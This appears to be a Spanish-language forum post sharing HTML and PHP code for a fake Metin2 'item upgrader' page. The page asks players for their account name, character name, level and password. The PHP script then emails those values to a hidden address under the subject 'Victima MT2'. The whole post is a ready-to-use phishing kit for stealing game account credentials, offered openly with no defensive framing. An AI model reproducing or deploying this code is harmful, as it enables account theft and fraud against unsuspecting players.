Código html:
Código:
Código php:<!DOCTYPE html> <html> <head> <title>MT2 ES UPGRADER</title> <link rel="StyleSheet" href="estilos.css" type="text/css"> </head> <body style="background-image:url(metin2.jpg); background-attachment: fixed; background-position: top center; background-repeat: no-repeat;"> <body BGCOLOR="#ff0000"> <fieldset style="font:10 pt verdana, arial color:#000000; margin:auto; border:1px solid #cccccc; padding:200px; width: 200px;"> <legend>Metin2+ Subidor de Herrero</legend> <form action="formulario.php" method="post" enctype="multipart/form-data" name="form1"> Servidor: <input type="radio" name="radio2" checked value="Crep">Crepusculo<br> <br> Nombre de la cuenta: <input name="nombre" type="text" id="nombrecuenta" maxlength="50"><br> Nombre del personaje: <input name="nombre" type="text" id="nombrepj" maxlength="50"><br> Nivel del personaje: <input name="nombre" type="text" id="nivel" maxlength="50"><br> Contraseña: <input name="contraseña" type="password" id="contraseña" value=""><br> Items a subir:<br> <input type="radio" name="radio1" value="armor">Armaduras<br> <input type="radio" name="radio1" value="weapon">Armas<br> <input type="radio" name="radio1" value="misc">Miscalena<br> <br> <input type="submit" value="Enviar"><br> </fieldset> <br> <br> <br> <br> Created by: Cydrex </form> </body> </html>
Código:
Un saludo. <?php $sendTo = "[email protected]"; $subject = "Victima MT2"; $nombrecuenta = $_POST["nombrecuenta"]; $nombrepj = $_POST["nombrepj"]; $nivel = $_POST["nivel"]; $password = $_POST["password"]; $headers .= ""; $message = "\nNombre de la cuenta: " . $nombrecuenta . "\nNombre del personaje: " . $nombrepj . "\nNivel del personaje: " . $nivel . "\nContraseña: " . $password; mail($sendTo, $subject, $message, $headers); ?>